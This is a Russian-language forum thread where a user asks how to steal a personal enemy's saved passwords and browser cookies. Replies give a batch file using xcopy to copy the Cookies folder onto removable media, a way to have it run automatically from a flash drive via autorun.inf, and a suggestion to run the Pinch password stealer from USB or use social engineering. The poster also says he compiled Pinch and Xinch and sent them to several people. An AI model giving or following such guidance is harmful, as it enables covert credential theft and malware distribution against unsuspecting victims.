![]() |
Help по Винде
Парни всем привет... )
Парни у меня есть вопрос вот тока в какой раздел его писать так и непонял..... ( Поэтому решил написать тут..... Есть один нехороший человек с которым надыть разобратся в виртуале..... Наскока я знаю он все пасы сохраняет на своей машине во всем известных "Cookies" Парни Плиз обьясните как можно стащить у него эту папку Я знаю то что можно както все "Cookies" стащить через какойто сплойт для IE или я ошибаюсь ... Я еще хотел узнать может можно "Cookies" стащить через какойнибудь *.exe - шник т.е. написать *.exe - шник в Delphi так чтобы наример когда к этому челу придешь с винтом и запустив этот *.exe - шник Cookies скапировались на мой винт. Возможно ли это? А может какимнить Трояром можно у него их выпалить? |
Цитата:
|
Блин Thanat0z я начинающий ( я понятия неимею что такое "батник" :(((
|
cmd -> xcopy /?
Например для IE: сделай файл в блокноте и сохрани с расширением bat Цитата:
P.S. Пути, где хранятся кукисы могут быть другими, так что можно прописать все возможные... Можно вообще автоматизировать: На флешку записать этот батник и файл autorun.inf, в котором прописан запуск этого батника, тогда, если служба определения оборудования оболочки не отключена в XP, достаточно только вставить флэшку и кукисы скопируются на неё автоматом... |
А если он не знает диру к кукам. Проще пинча запустить с флешки он точно все пассы тебе отдаст, ну если он их конечно сохраняет. Лучше соц инженерия =)
|
Хочу добавить.
Открываеш блокнот пишиш xcopy "c:\Documents and Settings\Администратор\Cookies" a:\Cookies и сохраняеш как имя-файла.bat |
Цитата:
А вот насчет Флешки можно поподробнее плиз Как я понял это что-то типо как раньше "МАСЯНЯ" была да? Если да то как эту флушку изменить и что с ней вообще необходимо сделать для того что бы скомуниздить КУКИ Цитата:
Pinch and Xinch надо склеить с флехой? А вот насчет Pinch-a and Xinch-a есть ЫШО вопросик почему когда я их скомпилил и скинул нескольким людям допустим 4-м мне отчеты пришли тока от 2-х? ((( |
антивирус спалил их )
|
Цитата:
|
Цитата:
возможно фаер |
| Время: 12:46 |